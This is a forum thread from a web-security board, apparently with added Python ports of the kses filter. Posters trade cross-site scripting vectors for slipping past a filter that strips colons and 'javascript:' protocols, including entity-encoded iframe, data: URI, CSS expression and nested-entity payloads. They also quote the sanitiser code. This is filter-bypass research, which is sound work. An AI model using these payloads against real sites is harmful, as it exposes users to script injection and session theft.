Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 24, 2008 02:17PM

I'm trying to find vulns in an app, and they are filtering all colons (:) in the HTML. Is that really a safe method? I haven't seen that used before. I've tried all obvious methods of encoding to try and get round that, but even all the crazy vectors on here don't work unless you have a : available!

Many thanks

Re: Unusual filter (colon?)
Posted by: Matt Presson
Date: June 24, 2008 02:28PM

I have found sometimes that if you use the encoding (HTML mostly) inside of a CSS style exploit then the encoding works. I use it with the style="javascript:expression(alert(1))" style attacks. Seems to work wonders, although that particular attack will only affect IE browsers, as expression() is an IE-only function.

-----------------------------------------------------------------------
(ú=(θ='',[µ=!(Φ=!θ+{})+θ,Θ=Φ[ø=+!θ]+Φ[+θ],ĩ=µ[ø],Ø=µ[º=ø+++ø],Ç=Φ[º+ø],à=ú[Φ[º+º]+Φ[+θ]+Ç+ĩ]][Ø+Ç+Θ])())[ĩ+à('•êí')](Ç+à('Á«)'))

Re: Unusual filter (colon?)
Posted by: thornmaker
Date: June 27, 2008 12:02PM

A few more details would be helpful. Are you trying XSS? If so, why not just go with the old and trusty
 "><script>alert(0)</script>

SQL injection? colons should not be an issue.

Are other characters filtered as well? If so, this could change your options quite a bit.

Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 27, 2008 12:27PM

<iframe/src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41>


I still don't know why we get these questions, there's a tool that does it all for you....
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGlmcmFtZS9zcmM9PEBkZWNfZW50XzAoKT5qYXZhc2NyaXB0OmFsZXJ0KDEpPEAvZGVjX2VudF8wPj4%3D

Hackvertor power!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 29, 2008 08:19AM

Thanks lol, well the filtering is actually very good on the app I'm testing; they decode all dec/hex entities in the sanitisation routine.

e.g.

function wp_kses_decode_entities($string)
###############################################################################
# This function decodes numeric HTML entities (&#65; and &#x41;). It doesn't
# do anything with other entities like &auml;, but we don't need them in the
# URL protocol whitelisting system anyway.
###############################################################################
{
  # The /e modifier evaluates the replacement as PHP code (removed in PHP 7).
  # Each preg_replace makes one left-to-right pass; its output is not rescanned.
  $string = preg_replace('/&#([0-9]+);/e', 'chr("\\1")', $string);
  $string = preg_replace('/&#[Xx]([0-9A-Fa-f]+);/e', 'chr(hexdec("\\1"))',
                         $string);

  return $string;
}

This rules out any use of encoding to beat the filter, as well as using htmlspecialchars etc. to prevent unwanted tags and protocols.

So I'm wondering if there are maybe any other methods for sneaking a vector into an href or img src attribute which don't use quotes or numeric entities. I'm guessing that's impossible though...

Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 29, 2008 08:48AM

@asilvermtzion

That regular expression doesn't take into account malformed entities. The vector above doesn't use semicolons.


Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 29, 2008 09:59AM

htmlspecialchars replaces ampersands, therefore how can you use malformed entities? This sanitisation routine seems to filter out legit entities, and if one is not recognised it just reverts to regular filtering, i.e. if I try an entity such as &#x5c2d it doesn't get through... (entity normalisation)

That vector still uses the "javascript:" protocol, which this code detects as an unwanted protocol and just fishes it out, leaving just "alert(1)" or whatever.

Maybe I'm missing something obvious here.

I was also reading your protocol fuzzing stuff, which is amazing, but it still always uses ":", meaning this code filters it out:

function wp_kses_bad_protocol_once($string, $allowed_protocols)
###############################################################################
# This function searches for URL protocols at the beginning of $string, while
# handling whitespace and HTML entities.
###############################################################################
{
  # Group 1 is everything (entities, whitespace, alphanumerics) before the
  # first colon, literal or entity-encoded; it is handed to
  # wp_kses_bad_protocol_once2 for the whitelist check.
  return preg_replace('/^((&[^;]*;|[\sA-Za-z0-9])*)'.
                      '(:|&#58;|&#[Xx]3[Aa];)\s*/e',
                      'wp_kses_bad_protocol_once2("\\1", $allowed_protocols)',
                      $string);
}




Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 29, 2008 01:17PM

@asilvermtzion

The first one you posted would not have protected against malformed entities, I was unaware that the site normalised entities. If you explain where the code is injected and what the output page looks like it may help get a vector.


Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 29, 2008 04:05PM

Yeah, my bad, I should have given more info. Upon reflection, it's using http://sourceforge.net/projects/kses which is a discontinued HTML purifier; some vulns are available but they have been patched in this implementation (style attributes disabled as well).

So I guess this is just pissing in the wind as all angles appear to be covered, but I'm still trying to get a vector to work with it, just for the challenge aspect of beating some reasonably strict regex.... I've tried all manner of encodings, null bytes, variable width encoding vectors etc. but I'm having no luck. :3

Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 29, 2008 04:50PM

Seems to get round it; you could either add a base64 encoding or a plain payload:
<a href="data&#x00003atext/html,">test</a>


Re: Unusual filter (colon?)
Posted by: kuza55
Date: June 29, 2008 06:51PM

asilvermtzion Wrote:
-------------------------------------------------------
> Thanks lol, well the filtering is actually very good on the app I'm testing;
> they decode all dec/hex entities in the sanitisation routine.
>
> e.g.
>
> ###############################################################################
> # This function decodes numeric HTML entities (&#65; and &#x41;). It doesn't
> # do anything with other entities like &auml;, but we don't need them in the
> # URL protocol whitelisting system anyway.
> ###############################################################################
> {
>   $string = preg_replace('/&#([0-9]+);/e', 'chr("\\1")', $string);
>   $string = preg_replace('/&#[Xx]([0-9A-Fa-f]+);/e', 'chr(hexdec("\\1"))',
>                          $string);
>
>   return $string;
> }
>
> This rules out any use of encoding to beat the filter, as well as using
> htmlspecialchars etc. to prevent unwanted tags and protocols.
>
> So I'm wondering if there are maybe any other methods for sneaking a vector
> into an href or img src attribute which don't use quotes or numeric
> entities. I'm guessing that's impossible though...


Non-recursive filtering FTL:
<?php

$string = "&#&#53;8;";

# First pass: only the inner &#53; is a well-formed entity, so it becomes "5"
# and the string is now "&#58;". Nothing rescans the result, so the entity
# assembled by the first pass is never decoded.
$string = preg_replace('/&#([0-9]+);/e', 'chr("\\1")', $string);
$string = preg_replace('/&#[Xx]([0-9A-Fa-f]+);/e', 'chr(hexdec("\\1"))',
                       $string);

print $string;   # prints &#58;
?>

P.S. Filtering is bad; rejecting dodgy input is better. That way you don't get caught up in your own code.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

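kuza55's point about a single decoding pass, as an added example that is not code from the thread or from kses: the two regexes above ported from PHP preg_replace(.../e) to Python, beside a bounded fixpoint decoder that keeps going until a pass changes nothing. PHP's chr() keeps only the low byte, so the port does the same; the round cap of 8 is an arbitrary choice for the example.

```python
import re

# The two kses decode regexes from the thread (ported, not kses' own code).
DEC_ENTITY = re.compile(r"&#([0-9]+);")
HEX_ENTITY = re.compile(r"&#[Xx]([0-9A-Fa-f]+);")


def decode_once(s: str) -> str:
    """One left-to-right pass per regex; the output is never rescanned,
    exactly like the PHP version."""
    s = DEC_ENTITY.sub(lambda m: chr(int(m.group(1)) % 256), s)  # PHP chr()
    s = HEX_ENTITY.sub(lambda m: chr(int(m.group(1), 16) % 256), s)
    return s


def decode_fixpoint(s: str, max_rounds: int = 8):
    """Repeat decode_once until a pass changes nothing.

    Returns (decoded text, number of passes that changed something). Input
    nested deeper than max_rounds is refused instead of half-decoded, which
    is the 'reject dodgy input' approach rather than the 'repair it' one.
    """
    for rounds in range(max_rounds):
        t = decode_once(s)
        if t == s:
            return s, rounds
        s = t
    raise ValueError("entity nesting deeper than %d rounds" % max_rounds)


def is_double_encoded(s: str) -> bool:
    """True when one decode leaves behind something that decodes again,
    i.e. the single-pass filter and a second decoder would disagree."""
    once = decode_once(s)
    return decode_once(once) != once


if __name__ == "__main__":
    # Constructed sample inputs: a plain entity, kuza55's nested one, and a
    # three-deep nesting that needs three passes.
    for payload in ("&#58;", "&#&#53;8;", "&#&#&#53;3;8;",
                    "&#106;avascript&#58;alert(1)"):
        print("%-30r once=%-24r fixpoint=%r" % (
            payload, decode_once(payload), decode_fixpoint(payload)))
```

The single pass turns `&#&#53;8;` into `&#58;` and stops there; the fixpoint version needs two passes to reach the bare colon and reports how many it used, which is a cheap signal that someone is stacking encodings.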
Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 30, 2008 06:32AM

Hi Gareth, I'm just getting that filtered to:

<a href="data&amp;#x00003atext/html,">test</a>

Looking at the code some more, there seems to be some extra regex outside of the HTML filter:

$text = str_replace('&&', '&#038;&', $text);
$text = str_replace('&&', '&#038;&', $text);
$text = preg_replace('/&(?:$|([^#])(?![a-z1-4]{1,8};))/', '&#038;$1', $text);

Also this in the filter:

# Disarm all entities by converting & to &amp;

$string = str_replace('&', '&amp;', $string);

I guess it doesn't change the #x3a back because it's not an accepted entity.

kuza55, very nice idea... although it doesn't seem to actually get replaced:
<a href="javascript&amp;#&#53;8;alert(1),">test</a>

I don't understand why; I think because of the way the protocol filtering works it's not actually getting to the decoding stage.

<?php

function wp_kses_normalize_entities2($i)
###############################################################################
# This function helps wp_kses_normalize_entities() to only accept 16 bit values
# and nothing more for &#number; entities.
###############################################################################
{
  return (($i > 65535) ? "&amp;#$i;" : "&#$i;");
} # function wp_kses_normalize_entities2

$string = "&#&#53;8;";

# Disarm all entities by converting & to &amp;
$string = str_replace('&', '&amp;', $string);

# Change back the allowed entities in our entity whitelist
$string = preg_replace('/&amp;([A-Za-z][A-Za-z0-9]{0,19});/',
                       '&\\1;', $string);
$string = preg_replace('/&amp;#0*([0-9]{1,5});/e',
                       'wp_kses_normalize_entities2("\\1")', $string);
$string = preg_replace('/&amp;#([Xx])0*(([0-9A-Fa-f]{2}){1,2});/',
                       '&#\\1\\2;', $string);

/*
$string = preg_replace('/&#([0-9]+);/e', 'chr("\\1")', $string);
$string = preg_replace('/&#[Xx]([0-9A-Fa-f]+);/e', 'chr(hexdec("\\1"))',
                       $string);
*/

print $string;
?>

If you run that test with the bits I've commented out then you see the same result I got.

I think it might be doable if you can trick the code into testing a protocol and leaving the malicious protocol behind; this is the code that does that:

function wp_kses_bad_protocol($string, $allowed_protocols)
###############################################################################
# This function removes all non-allowed protocols from the beginning of
# $string. It ignores whitespace and the case of the letters, and it does
# understand HTML entities. It does its work in a while loop, so it won't be
# fooled by a string like "javascript:javascript:alert(57)".
###############################################################################
{
  $string = wp_kses_no_null($string);
  $string2 = $string.'a';

  # Keep calling wp_kses_bad_protocol_once (above) until a pass changes nothing
  while ($string != $string2)
  {
    $string2 = $string;
    $string = wp_kses_bad_protocol_once($string, $allowed_protocols);
  } # while

  return $string;
}

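To trace the thread's payloads through the whole href pipeline offline, here is an added Python port (not the thread's code and not kses itself) of the routines quoted in this thread: wp_kses_normalize_entities from asilvermtzion's test script, wp_kses_bad_protocol_once and wp_kses_bad_protocol. wp_kses_bad_protocol_once2 is not quoted anywhere in the thread, so the body given for it below is an assumption (decode entities, strip whitespace and nulls, lowercase, keep the scheme only if whitelisted), and ALLOWED is an assumed whitelist chosen for the example.

```python
import re

# Assumed protocol whitelist for the example.
ALLOWED = ("http", "https", "ftp", "mailto")

DEC_ENTITY = re.compile(r"&#([0-9]+);")
HEX_ENTITY = re.compile(r"&#[Xx]([0-9A-Fa-f]+);")
# The wp_kses_bad_protocol_once pattern, as quoted in the thread.
PROTOCOL = re.compile(r"^((&[^;]*;|[\sA-Za-z0-9])*)(:|&#58;|&#[Xx]3[Aa];)\s*")


def no_null(s):
    return s.replace("\0", "")


def decode_entities(s):
    # wp_kses_decode_entities: one pass per regex; PHP chr() keeps the low byte
    s = DEC_ENTITY.sub(lambda m: chr(int(m.group(1)) % 256), s)
    return HEX_ENTITY.sub(lambda m: chr(int(m.group(1), 16) % 256), s)


def normalize_entities(s):
    # wp_kses_normalize_entities: disarm every '&', then re-arm only named
    # entities, 16-bit decimal entities and 1..2 byte hex entities, all of
    # which must end in ';'. Anything else stays as a literal '&amp;'.
    s = s.replace("&", "&amp;")
    s = re.sub(r"&amp;([A-Za-z][A-Za-z0-9]{0,19});", r"&\1;", s)
    s = re.sub(r"&amp;#0*([0-9]{1,5});",
               lambda m: ("&amp;#%s;" if int(m.group(1)) > 65535 else "&#%s;")
               % m.group(1), s)
    s = re.sub(r"&amp;#([Xx])0*(([0-9A-Fa-f]{2}){1,2});", r"&#\1\2;", s)
    return s


def bad_protocol_once2(proto, allowed):
    # ASSUMED body (not quoted in the thread): normalise the candidate scheme
    # and keep it only if it is whitelisted, otherwise drop it entirely.
    p = no_null(re.sub(r"\s", "", decode_entities(proto))).lower()
    return p + ":" if p in [a.lower() for a in allowed] else ""


def bad_protocol_once(s, allowed):
    # preg_replace with a ^-anchored pattern can only replace at the start
    return PROTOCOL.sub(lambda m: bad_protocol_once2(m.group(1), allowed),
                        s, count=1)


def bad_protocol(s, allowed=ALLOWED):
    # wp_kses_bad_protocol: loop until a pass changes nothing, so stacked
    # schemes such as javascript:javascript: are peeled off one at a time
    s = no_null(s)
    prev = None
    while s != prev:
        prev = s
        s = bad_protocol_once(s, allowed)
    return s


def kses_href(value, allowed=ALLOWED):
    """Order used in this thread: entities are normalised before the
    protocol check, so only well-formed entities ever reach bad_protocol."""
    return bad_protocol(normalize_entities(value), allowed)


if __name__ == "__main__":
    # Constructed inputs: the thread's own payloads plus a few variants.
    for v in ("javascript:alert(1)", "javascript:javascript:alert(1)",
              "&#106;avascript&#58;alert(1)", "jav&#x09;ascript:alert(1)",
              "data&#x3a;text/html,", "javascript&#&#53;8;alert(1)",
              "data&#x00003atext/html,", "HTTP://example.com/"):
        print("%-32s -> %s" % (v, kses_href(v)))
```

Run this way, the two payloads from the thread come out exactly as asilvermtzion reported (`javascript&amp;#&#53;8;alert(1)` and `data&amp;#x00003atext/html,`): the doubly encoded colon and the semicolon-less hex entity are not well-formed, so normalize_entities leaves their ampersand disarmed as `&amp;`, and the protocol regex then never sees a colon to act on. Well-formed variants (`&#58;`, `&#x3a;`, an entity-encoded tab inside the scheme) are decoded by the assumed once2 helper and stripped by the loop.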